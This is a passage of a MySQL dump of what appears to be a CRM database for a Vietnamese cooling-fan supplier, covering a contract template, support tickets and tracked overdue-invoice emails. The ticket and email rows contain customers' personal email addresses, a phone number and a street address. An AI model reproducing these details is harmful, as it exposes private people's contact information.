nhau</span></li>\n</ul>\n</li>\n</ul>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><em>&#160;</em></span></p>\n<table width=\"1440\" style=\"height:334px;\">\n<tbody>\n<tr>\n<td style=\"width:680.688px;\">\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>TM V&#192; &#272;&#7840;I DI&#7878;N CHO B&#202;N </strong><strong>A</strong></span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><em>&#160;</em></span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><em>&#160;</em></span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><em>&#160;</em></span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><em>&#160;</em></span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><em>&#160;</em></span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><em>----------------------------------------------------</em></span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><em>&#160;</em></span></p>\n</td>\n<td style=\"width:743.312px;\">\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>TM V&#192; &#272;&#7840;I DI&#7878;N CHO B&#202;N B</strong></span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><em>&#160;</em></span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><em>&#160;</em></span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><em>&#160;</em></span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><em>&#160;</em></span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><em>&#160;</em></span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><em>----------------------------------------------------</em></span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>H&#7891; V&#259;n C&#244;ng</strong></span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">Gi&#225;m &#273;&#7889;c</span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><em>&#160;</em></span></p>\n</td>\n</tr>\n</tbody>\n</table>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><em>&#160;</em></span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>&#160;</strong></span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>&#160;</strong></span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>&#160;</strong></span></p>\n<span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong></span>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>PH&#7908; L&#7908;C 1 &#8211; CHI TI&#7870;T H&#192;NG H&#211;A </strong></span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong><em>&#160;</em></strong></span></p>\n&lt;\n<table width=\"778\">\n<tbody>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>TT</strong></span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>H&#7841;ng m&#7909;c</strong></span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>M&#244; </strong><strong>t&#7843;</strong></span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>&#272;&#417;n v&#7883;</strong></span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>S&#7889; l&#432;&#7907;ng</strong></span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>&#272;&#417;n gi&#225;</strong></span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>T&#7893;ng c&#7897;ng (VN&#272;)</strong></span></p>\n</td>\n</tr>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">01</span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">Qu&#7841;t l&#224;m m&#225;t HVLS UFO 1 SERIES</span></p>\n</td>\n<td>\n<table width=\"346\">\n<tbody>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>Qu&#7841;t l&#224;m m&#225;t HVLS UFO 1 SERIES</strong></span></p>\n</td>\n</tr>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">8\', Alumium Airfoil Set, 7 blade</span></p>\n</td>\n</tr>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">&#272;&#432;&#7901;ng k&#237;nh c&#225;nh: <strong>&#160;8ft ft (2.4 m)</strong></span></p>\n</td>\n</tr>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">C&#225;nh qu&#7841;t / Airfoils : 7 c&#225;nh. Ch&#7845;t li&#7879;u c&#225;nh: Aluminum</span></p>\n</td>\n</tr>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">T&#7889;c &#273;&#7897; quay t&#7889;i &#273;a / Max Speed:&#160; 95 RPM (max speed)</span></p>\n</td>\n</tr>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">Ngu&#7891;n &#273;i&#7879;n / Input Power: <strong>220-240 VAC, 1&#934;, 50/60 Hz</strong></span></p>\n</td>\n</tr>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">&#272;i&#7873;u khi&#7875;n / Control: Remote Control for Wall</span></p>\n</td>\n</tr>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">&#272;&#7897; &#7891;n / Sound at Max Speed: &lt;35 dBA</span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">Tr&#7885;ng l&#432;&#7907;ng: 18 kg</span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">Di&#7879;n t&#237;ch bao ph&#7911; m&#225;t / Max Affected Area: 1,722 ft2 / 160 m2</span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">L&#432;u l&#432;&#7907;ng lu&#7891;ng gi&#243;: 24,500 CFM (41,596 m3/h)</span></p>\n</td>\n</tr>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">C&#244;ng su&#7845;t &#273;&#7897;ng c&#417; / Power Consumption: 84 W</span></p>\n</td>\n</tr>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">Ph&#7909; ki&#7879;n an to&#224;n k&#232;m theo, b&#7897; ph&#7909; ki&#7879;n l&#7855;p c&#225;nh qu&#7841;t &#273;&#227; bao g&#7891;m</span></p>\n</td>\n</tr>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>Th&#432;&#417;ng hi&#7879;u: SUNON/ Taiwan</strong></span></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">B&#7897;</span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">09</span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">42,130,000</span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">379,170,000</span></p>\n</td>\n</tr>\n<tr>\n<td rowspan=\"6\">\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">02</span></p>\n</td>\n<td rowspan=\"6\">\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">Nh&#226;n C&#244;ng L&#7855;p &#272;&#7863;t Qu&#7841;t L&#224;m M&#225;t Treo Tr&#7847;n</span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">Thu&#234; gi&#224;n gi&#225;o &#273;&#7897; cao 6-8M</span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">lot</span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">1</span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">9,650,000</span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">9,650,000</span></p>\n</td>\n</tr>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">V&#7853;t t&#432; ph&#7909; thi c&#244;ng, d&#226;y c&#225;p v&#259;n ch&#7883;u l&#7921;c,&#160; s&#7855;t h&#224;n &#273;&#7905; m&#243;c treo, &#7889;c v&#237;t, t&#225;n, bu l&#244;ng, b&#259;ng keo &#273;i&#7879;n</span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">sets</span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">9</span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">1,385,000</span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">12,450,000</span></p>\n</td>\n</tr>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">Chi ph&#237; d&#226;y &#273;i&#7879;n, t&#7911; c&#7845;p ngu&#7891;n cho qu&#7841;t + &#7889;ng gen, kh&#244;ng bao g&#7891;m CB &#273;&#243;ng c&#7855;t ngu&#7891;n &#273;i&#7879;n 220V, 50-60Hz, 10A</span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">m</span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">540</span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">68,100</span></p>\n</td>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">36,774,000</span></p>\n</td>\n</tr>\n<tr>\n<td>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">Chi ph&#237; &#273;i d&#226;y c&#225;p &#273;i&#7873;u khi&#7875;n 18-20AWG k&#7871;t n&#7889;i v&#7899;i h&#7879; th&#7889;ng BMS trung t&#226;m</span></p>\n</td>\n</tr>\n</tbody>\n</tab');
INSERT INTO `tbltemplates` (`id`, `name`, `type`, `addedfrom`, `content`) VALUES
(2, 'Hợp đồng cung cấp QUẠT MÁT', 'proposals', 1, ''),
(3, 'Hơp đồng cung cấp lắp đặt QUẠT MÁT', 'proposals', 1, ''),
(4, 'Hợp đồng bảo trì bảo dưỡng - QUẠT MÁT', 'proposals', 1, ''),
(5, 'Yêu cầu khảo sát lắp đặt - QUẠT MÁT', 'proposals', 1, '');

-- --------------------------------------------------------

--
-- Table structure for table `tbltickets`
--

CREATE TABLE `tbltickets` (
  `ticketid` int(11) NOT NULL,
  `adminreplying` int(11) NOT NULL DEFAULT 0,
  `userid` int(11) NOT NULL,
  `contactid` int(11) NOT NULL DEFAULT 0,
  `merged_ticket_id` int(11) DEFAULT NULL,
  `email` text DEFAULT NULL,
  `name` text DEFAULT NULL,
  `department` int(11) NOT NULL,
  `priority` int(11) NOT NULL,
  `status` int(11) NOT NULL,
  `service` int(11) DEFAULT NULL,
  `ticketkey` varchar(32) NOT NULL,
  `subject` varchar(191) NOT NULL,
  `message` text DEFAULT NULL,
  `admin` int(11) DEFAULT NULL,
  `date` datetime NOT NULL,
  `project_id` int(11) NOT NULL DEFAULT 0,
  `lastreply` datetime DEFAULT NULL,
  `clientread` int(11) NOT NULL DEFAULT 0,
  `adminread` int(11) NOT NULL DEFAULT 0,
  `assigned` int(11) NOT NULL DEFAULT 0,
  `staff_id_replying` int(11) DEFAULT NULL,
  `cc` varchar(191) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tbltickets`
--

INSERT INTO `tbltickets` (`ticketid`, `adminreplying`, `userid`, `contactid`, `merged_ticket_id`, `email`, `name`, `department`, `priority`, `status`, `service`, `ticketkey`, `subject`, `message`, `admin`, `date`, `project_id`, `lastreply`, `clientread`, `adminread`, `assigned`, `staff_id_replying`, `cc`) VALUES
(82, 0, 0, 0, NULL, '0989343363@gmail.com', 'Co ho - 0989343363', 1, 2, 5, 1, 'fffa37af56cb2faf0036b375d9235b48', 'Yêu cầu Báo Giá', 'Thời gian đặt lịch : 2023-04-18 08:00:50 <br />\n Số điện thoại : 0989343363 <br />\n Địa chỉ : 185 Trần lưu <br />\n Nội dung: 08709990', NULL, '2023-04-17 18:36:17', 0, NULL, 0, 1, 0, NULL, NULL),
(84, 0, 0, 0, NULL, 'tranhoangyen074@gmail.com', 'Yến', 1, 2, 5, 1, '6eba072845d85e08a12625021c7ffb15', 'Yêu cầu báo giá sản phẩm', 'Yêu cầu báo giá sản phẩm và thời hạn bảo hành. Cảm ơn', NULL, '2023-07-31 08:16:40', 0, NULL, 1, 0, 0, NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `tbltickets_pipe_log`
--

CREATE TABLE `tbltickets_pipe_log` (
  `id` int(11) NOT NULL,
  `date` datetime NOT NULL,
  `email_to` varchar(100) NOT NULL,
  `name` varchar(191) NOT NULL,
  `subject` varchar(191) NOT NULL,
  `message` mediumtext NOT NULL,
  `email` varchar(100) NOT NULL,
  `status` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tbltickets_predefined_replies`
--

CREATE TABLE `tbltickets_predefined_replies` (
  `id` int(11) NOT NULL,
  `name` varchar(191) NOT NULL,
  `message` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tbltickets_predefined_replies`
--

INSERT INTO `tbltickets_predefined_replies` (`id`, `name`, `message`) VALUES
(1, 'Đã tiếp nhận yêu cầu - Hồ sơ học viên mới', '<p><span style=\"font-family:helvetica, arial, sans-serif;font-size:12pt;\">Ch&#250;ng t&#244;i &#273;&#227; ti&#7871;p nh&#7853;n y&#234;u c&#7847;u c&#7911;a b&#7841;n. Nh&#226;n vi&#234;n h&#7895; tr&#7907; s&#7869; li&#234;n h&#7879; l&#7841;i sau 2h.&#160;</span><br><span style=\"font-family:helvetica, arial, sans-serif;font-size:12pt;\">N&#7871;u b&#7841;n c&#7847;n g&#7845;p xin li&#234;n h&#7879; : 09xx xxxxxxx(Zalo/Viber/WhapsApp)</span></p>');

-- --------------------------------------------------------

--
-- Table structure for table `tbltickets_priorities`
--

CREATE TABLE `tbltickets_priorities` (
  `priorityid` int(11) NOT NULL,
  `name` varchar(50) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tbltickets_priorities`
--

INSERT INTO `tbltickets_priorities` (`priorityid`, `name`) VALUES
(1, 'Thấp'),
(2, 'Bình thường'),
(3, 'Cao');

-- --------------------------------------------------------

--
-- Table structure for table `tbltickets_status`
--

CREATE TABLE `tbltickets_status` (
  `ticketstatusid` int(11) NOT NULL,
  `name` varchar(50) NOT NULL,
  `isdefault` int(11) NOT NULL DEFAULT 0,
  `statuscolor` varchar(7) DEFAULT NULL,
  `statusorder` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tbltickets_status`
--

INSERT INTO `tbltickets_status` (`ticketstatusid`, `name`, `isdefault`, `statuscolor`, `statusorder`) VALUES
(1, 'Open', 1, '#ff2d42', 1),
(2, 'In progress', 1, '#84c529', 2),
(3, 'Answered', 1, '#0000ff', 3),
(4, 'On Hold', 1, '#c0c0c0', 4),
(5, 'Closed', 1, '#03a9f4', 5);

-- --------------------------------------------------------

--
-- Table structure for table `tblticket_attachments`
--

CREATE TABLE `tblticket_attachments` (
  `id` int(11) NOT NULL,
  `ticketid` int(11) NOT NULL,
  `replyid` int(11) DEFAULT NULL,
  `file_name` varchar(191) NOT NULL,
  `filetype` varchar(50) DEFAULT NULL,
  `dateadded` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblticket_attachments`
--

INSERT INTO `tblticket_attachments` (`id`, `ticketid`, `replyid`, `file_name`, `filetype`, `dateadded`) VALUES
(49, 82, NULL, '1A03EE77-AA0E-4A45-BE6C-3EEC1BB40AAB.jpg', 'image/jpeg', '2023-04-17 18:36:18'),
(50, 82, NULL, '1A03EE77-AA0E-4A45-BE6C-3EEC1BB40AAB1.jpg', 'image/jpeg', '2023-04-17 18:36:18'),
(51, 82, NULL, '1A03EE77-AA0E-4A45-BE6C-3EEC1BB40AAB2.jpg', 'image/jpeg', '2023-04-17 18:36:18'),
(52, 82, NULL, '1A03EE77-AA0E-4A45-BE6C-3EEC1BB40AAB3.jpg', 'image/jpeg', '2023-04-17 18:36:18');

-- --------------------------------------------------------

--
-- Table structure for table `tblticket_replies`
--

CREATE TABLE `tblticket_replies` (
  `id` int(11) NOT NULL,
  `ticketid` int(11) NOT NULL,
  `userid` int(11) DEFAULT NULL,
  `contactid` int(11) NOT NULL DEFAULT 0,
  `name` text DEFAULT NULL,
  `email` text DEFAULT NULL,
  `date` datetime NOT NULL,
  `message` text DEFAULT NULL,
  `attachment` int(11) DEFAULT NULL,
  `admin` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tbltodos`
--

CREATE TABLE `tbltodos` (
  `todoid` int(11) NOT NULL,
  `description` text NOT NULL,
  `staffid` int(11) NOT NULL,
  `dateadded` datetime NOT NULL,
  `finished` tinyint(1) NOT NULL,
  `datefinished` datetime DEFAULT NULL,
  `item_order` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tbltracked_mails`
--

CREATE TABLE `tbltracked_mails` (
  `id` int(11) NOT NULL,
  `uid` varchar(32) NOT NULL,
  `rel_id` int(11) NOT NULL,
  `rel_type` varchar(40) NOT NULL,
  `date` datetime NOT NULL,
  `email` varchar(100) NOT NULL,
  `opened` tinyint(1) NOT NULL DEFAULT 0,
  `date_opened` datetime DEFAULT NULL,
  `subject` mediumtext DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tbltracked_mails`
--

INSERT INTO `tbltracked_mails` (`id`, `uid`, `rel_id`, `rel_type`, `date`, `email`, `opened`, `date_opened`, `subject`) VALUES
(1, '37f530c4183492ec373d6d32aaec22b0', 2, 'estimate', '2022-01-11 22:32:30', 'thuylt@thuyltsolidinterior.vn', 1, '2022-01-11 22:32:42', 'Estimate # BGQT-2 created'),
(2, 'f241591f24ec0cd5c9069229c9ee355b', 5, 'invoice', '2022-01-14 13:47:42', 'congho@live.com', 1, '2022-01-14 13:47:47', 'Invoice with number INV-3-22 created'),
(3, '6e3d37c9d6ff8c90e17f1414a8729a82', 55, 'invoice', '2022-05-02 07:58:05', 'duy.ld@rollvn.com', 1, '2022-05-02 07:58:29', 'Invoice Overdue Notice - INV-52-22'),
(4, '6d36d2ec8e74a76931930ff3375749cc', 76, 'invoice', '2022-05-02 07:58:10', 'cskh@hogiaphat.vn', 1, '2022-05-02 07:58:13', 'Invoice Overdue Notice - INV-73-22'),
(5, '0f2623d4546de1741c8a1baf7a4a4edc', 1, 'appointment', '2022-06-13 22:33:02', 'congho@live.com', 0, NULL, 'Your appointment has been approved!'),
(7, '367378c4be547ec782bd007117a477ed', 131, 'invoice', '2022-08-30 11:36:18', 'khongco1@gmail.com', 1, '2022-08-30 11:36:29', 'Invoice Overdue Notice - INV-127-22'),
(8, '15e32db7cc5969b647137cafb5140ebd', 135, 'invoice', '2022-08-30 11:36:23', 'omanizen@gmail.com', 1, '2022-08-30 11:36:28', 'Invoice Overdue Notice - INV-131-22'),
(10, 'f2373c52500204777a1c152dd7b28cbb', 131, 'invoice', '2022-09-10 16:59:35', 'khongco1@gmail.com', 1, '2022-09-10 16:59:40', 'Invoice Overdue Notice - INV-127-22'),
(11, '1297339a45d29a48d94b14ed6970d69b', 135, 'invoice', '2022-09-10 16:59:40', 'omanizen@gmail.com', 1, '2022-09-14 22:25:35', 'Invoice Overdue Notice - INV-131-22'),
(12, '7160c49a87197ea798316f69a3f16f00', 144, 'invoice', '2022-09-10 16:59:47', 'hien.vo@alliancevn.com', 1, '2022-09-10 19:59:17', 'Invoice Overdue Notice - INV-140-22'),
(13, 'e9b51a8a93ae4a1cd4d33f4066caed9a', 145, 'invoice', '2022-09-10 16:59:53', 'info@savimec.vn', 1, '2022-09-10 17:29:34', 'Invoice Overdue Notice - INV-141-22'),
(14, '8c4120b6956558331607f92aba218064', 150, 'invoice', '2022-09-10 16:59:58', 'nga.do@mepac.vn', 1, '2022-09-10 17:01:23', 'Invoice Overdue Notice - INV-146-22'),
(15, '6ba1e344c0cce5fd64bafcdc52bec449', 131, 'invoice', '2022-09-23 11:53:55', 'khongco1@gmail.com', 1, '2022-09-23 11:54:00', 'Invoice Overdue Notice - INV-127-22'),
(16, '8a8943d9a7d6dfd55a7aa0d597fc3144', 135, 'invoice', '2022-09-23 11:54:01', 'omanizen@gmail.com', 1, '2022-09-23 11:55:22', 'Invoice Overdue Notice - INV-131-22'),
(17, 'f0e9eeeb882ec72a3ec0b5e56f0ed18e', 144, 'invoice', '2022-09-23 11:54:07', 'hien.vo@alliancevn.com', 1, '2022-09-23 11:54:14', 'Invoice Overdue Notice - INV-140-22'),
(18, '220ad6569e1e6bf663d7fd1ab02d8419', 145, 'invoice', '2022-09-23 11:54:13', 'info@savimec.vn', 1, '2022-09-23 11:54:30', 'Invoice Overdue Notice - INV-141-22'),
(19, '8b6b7600063a79f96062430e00189d21', 150, 'invoice', '2022-09-23 11:54:21', 'nga.do@mepac.vn', 1, '2022-09-23 11:54:28', 'Invoice Overdue Notice - INV-146-22'),
(20, '23c743c7ed3d384e58cadc12eb08686f', 131, 'invoice', '2022-10-14 09:44:28', 'khongco1@gmail.com', 1, '2022-10-14 09:44:36', 'Invoice Overdue Notice - INV-127-22'),
(21, 'e224115efb3182e90a3673533d17d167', 135, 'invoice', '2022-10-14 09:44:34', 'omanizen@gmail.com', 1, '2022-10-14 10:07:32', 'Invoice Overdue Notice - INV-131-22'),
(22, '1f9bd71a4b5a8417ec420debf315bd4e', 144, 'invoice', '2022-10-14 09:44:40', 'hien.vo@alliancevn.com', 1, '2022-10-14 10:07:14', 'Invoice Overdue Notice - INV-140-22'),
(23, '7df88e34c0c3139541f31660e56c0c9c', 145, 'invoice', '2022-10-14 09:44:46', 'info@savimec.vn', 1, '2022-10-14 10:06:55', 'Invoice Overdue Notice - INV-141-22'),
(29, '341836d03c017999c5351e414fed670b', 131, 'invoice', '2022-11-08 11:46:22', 'khongco1@gmail.com', 1, '2022-11-08 11:50:11', 'Invoice Overdue Notice - INV-127-22'),
(30, 'c3564d7e747c0fe8064115ef6a971176', 135, 'invoice', '2022-11-08 11:46:26', 'omanizen@gmail.com', 1, '2022-11-08 11:49:55', 'Invoice Overdue Notice - INV-131-22'),
(31, '8bc2523da09cc3824022d5b50f48c661', 144, 'invoice', '2022-11-08 11:46:30', 'hien.vo@alliancevn.com', 1, '2022-11-08 12:08:30', 'Invoice Overdue Notice - INV-140-22'),
(32, '96296642a0a194711dbac1a348c535cd', 145, 'invoice', '2022-11-08 11:46:34', 'info@savimec.vn', 1, '2022-11-08 12:00:38', 'Invoice Overdue Notice - INV-141-22'),
(33, '5c942e5cbf98e81a886d0d06f53cde67', 131, 'invoice', '2022-11-14 21:01:37', 'khongco1@gmail.com', 1, '2022-11-14 21:01:42', 'Invoice Overdue Notice - INV-127-22'),
(34, 'ef5c1e7d8ac37d8636faf1deb3bcc396', 135, 'invoice', '2022-11-14 21:01:41', 'omanizen@gmail.com', 1, '2022-11-14 21:02:25', 'Invoice Overdue Notice - INV-131-22'),
(35, 'edd37455123da642553804eb9838b893', 144, 'invoice', '2022-11-14 21:01:45', 'hien.vo@alliancevn.com', 1, '2022-11-14 21:04:00', 'Invoice Overdue Notice - INV-140-22'),
(36, 'b7bb867b8e4a95d52e5f387b0b27530d', 131, 'invoice', '2022-11-17 06:53:07', 'khongco1@gmail.com', 0, NULL, 'Invoice Overdue Notice - INV-127-22'),
(37, '669d0f8d72928be2a1b2f8e8643edf2b', 135, 'invoice', '2022-11-17 06:53:11', 'omanizen@gmail.com', 0, NULL, 'Invoice Overdue Notice - INV-131-22'),
(38, '062f4346254a8a0d217af0c2744edc6c', 144, 'invoice', '2022-11-17 06:53:16', 'hien.vo@alliancevn.com', 1, '2022-11-17 08:01:43', 'Invoice Overdue Notice - INV-140-22'),
(39, '682db75682ffc253fb65d8fa1b1fb90c', 131, 'invoice', '2022-11-20 08:44:58', 'khongco1@gmail.com', 1, '2022-11-20 08:45:20', 'Invoice Overdue Notice - INV-127-22'),
(40, 'd5f181968603eb928da34258a431f30a', 135, 'invoice', '2022-11-20 08:45:02', 'omanizen@gmail.com', 1, '2022-11-20 08:45:33', 'Invoice Overdue Notice - INV-131-22'),
(42, '38137895c6247ed960e07a7cc889ec69', 131, 'invoice', '2022-11-24 08:58:10', 'khongco1@gmail.com', 0, NULL, 'Invoice Overdue Notice - INV-127-22'),
(43, '54fb40599fc26b4f029ef9f4b8e89959', 135, 'invoice', '2022-11-24 08:58:14', 'omanizen@gmail.com', 1, '2022-11-25 04:09:21', 'Invoice Overdue Notice - INV-131-22'),
(44, '460ad1dcc27c3593fcc3d4ceae8acced', 131, 'invoice', '2022-11-30 09:18:22', 'khongco1@gmail.com', 0, NULL, 'Invoice Overdue Notice - INV-127-22'),
(45, '8c5b3f80263239d2d40e37d15040c202', 135, 'invoice', '2022-11-30 09:18:26', 'omanizen@gmail.com', 1, '2022-11-30 17:51:19', 'Invoice Overdue Notice - INV-131-22'),
(46, '77ed819940820a65d2226055c870be62', 131, 'invoice', '2022-12-06 08:52:46', 'khongco1@gmail.com', 1, '2022-12-06 09:40:22', 'Invoice Overdue Notice - INV-127-22'),
(47, 'f7fb5c13aa8a553f9427d7c85cf8f0c1', 135, 'invoice', '2022-12-06 08:52:50', 'omanizen@gmail.com', 1, '2022-12-06 09:40:12', 'Invoice Overdue Notice - INV-131-22'),
(48, '4520fa64e08ff1aeb136d590300194d2', 325, 'invoice', '2023-09-04 01:00:05', 'tuong.tran@tecon.com.vn', 1, '2023-09-04 11:28:55', 'Invoice Overdue Notice - INV-319-23'),
(49, 'cafa4c023222ed405a3e9d7d82e98aa2', 325, 'invoice', '2023-09-07 01:00:07', 'tuong.tran@tecon.com.vn', 1, '2023-09-07 04:37:49', 'Invoice Overdue Notice - INV-319-23'),
(50, 'c274be6427c9228d44457160194fcfa3', 325, 'invoice', '2023-09-10 01:00:07', 'tuong.tran@tecon.com.vn', 1, '2023-09-10 14:50:58', 'Invoice Overdue Notice - INV-319-23'),
(51, '65b05cd500a9bcf9e0980c6869dd30c6', 2, 'appointment', '2023-09-26 21:19:07', 'congho@hogiaphat.vn', 1, '2023-09-26 21:55:35', 'Your appointment has been approved!'),
(52, '612804dc69a4d9fac4994d42bf96dda0', 3, 'appointment', '2023-09-26 21:48:14', 'congho@hogiaphat.vn', 1, '2023-09-28 14:21:45', 'Your appointment has been approved!'),
(53, 'f68ea1f3bcc210ff3bfec1a4b3ed7b70', 4, 'appointment', '2023-11-01 09:51:04', 'hogiaphatco@gmail.com', 1, '2023-11-01 10:07:44', 'Your appointment has been approved!'),
(54, '9d1f2b61527e95a9490931d5a66cd157', 389, 'invoice', '2024-02-22 01:00:05', 'hotro@hogiaphat.vn', 1, '2024-02-22 01:00:17', 'Invoice Overdue Notice - INV-379-24'),
(55, '5cac3abf476780dedaf1b7298860a927', 389, 'invoice', '2024-02-25 01:00:06', 'hotro@hogiaphat.vn', 1, '2024-02-25 01:00:18', 'Invoice Overdue Notice - INV-379-24'),
(56, '39260db0f40ee82c2e05b1c9a5b010b1', 389, 'invoice', '2024-02-28 01:00:05', 'hotro@hogiaphat.vn', 1, '2024-02-28 01:00:19', 'Invoice Overdue Notice - INV-379-24'),
(57, '446aacabddf980678b159747833cef89', 389, 'invoice', '2024-03-02 01:00:05', 'hotro@hogiaphat.vn', 1, '2024-03-02 01:00:12', 'Invoice Overdue Notice - INV-379-24'),
(58, '233b803f70fff7ab9e59428883c96412', 389, 'invoice', '2024-03-06 01:00:04', 'hotro@hogiaphat.vn', 1, '2024-03-06 01:00:15', 'Invoice Overdue Notice - INV-379-24'),
(59, 'e040f81fe94904b3a1f80b38ea531d7c', 389, 'invoice', '2024-03-10 01:00:05', 'hotro@hogiaphat.vn', 1, '2024-03-10 01:00:16', 'Invoice Overdue Notice - INV-379-24');

-- --------------------------------------------------------

--
-- Table structure for table `tbltwocheckout_log`
--

CREATE TABLE `tbltwocheckout_log` (
  `id` int(10) UNSIGNED NOT NULL,
  `reference` varchar(64) NOT NULL,
  `invoice_id` int(11) NOT NULL,
  `amount` varchar(25) NOT NULL,
  `created_at` datetime NOT NULL,
  `attempt_reference` varchar(100) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tbluser_api`
--

CREATE TABLE `tbluser_api` (
  `id` int(11) NOT NULL,
  `user` varchar(50) NOT NULL,
  `name` varchar(50) NOT NULL,
  `token` varchar(255) NOT NULL,
  `expiration_date` datetime NOT NULL,
  `permission_enable` tinyint(4) DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

--
